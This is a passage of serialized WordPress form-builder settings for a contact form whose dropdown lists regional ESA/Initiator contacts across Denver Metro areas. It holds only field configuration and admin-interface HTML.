dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_98\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_98\";s:14:\"drawerDisabled\";b:0;}}i:293;a:1:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:14:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:44:\"ESA/Initiator-Fred Bell-Denver Metro Central\";s:5:\"value\";s:44:\"esa-initiator-fred-bell-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:49:\"ESA/Initiator-Gordon Garland-Denver Metro Central\";s:5:\"value\";s:24:\"Initiator-Vickie Cashman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:52:\"ESA/Initiator-Bette Jean Wagner-Denver Metro Central\";s:5:\"value\";s:52:\"ESA-Initiator-bette-jean-wagner-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:46:\"ESA/Initiator-James Fischer-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-James Fischer-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"6\";s:12:\"manual_value\";b:1;}i:5;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:6;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Lura Fischer-Denver Metro North\";s:5:\"value\";s:41:\"initiator-lura-fischer-denver-metro-north\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:46:\"ESA/Initiator-Lura Lee Genz-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-Lura Lee Genz-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"ESA/Initiator-Tim Kuss-Denver Metro South\";s:5:\"value\";s:41:\"esa-initiator-tim-kuss-denver-metro-south\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Jack Lile-Denver Metro South \";s:5:\"value\";s:43:\"ESA-Initiator-Jack Lile-Denver Metro South \";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:12;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Raelin Harp-Denver Metro East\";s:5:\"value\";s:43:\"esa-initiator-raelin-harp-denver-metro-east\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:26:\"ESA/Initiator-Linda Bowman\";s:5:\"value\";s:26:\"ESA-Initiator-Linda Bowman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:14;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:30:\"ESA/Initiator-Rolf Mueller-Uri\";s:5:\"value\";s:29:\"ESAInitiator-Rolf Mueller-Uri\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:40:\"Initiator-Mary Griggs-Denver Metro West \";s:5:\"value\";s:39:\"initiator-mary-griggs-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:19;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Renee Wholey-Denver Metro West \";s:5:\"value\";s:40:\"initiator-renee-wholey-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 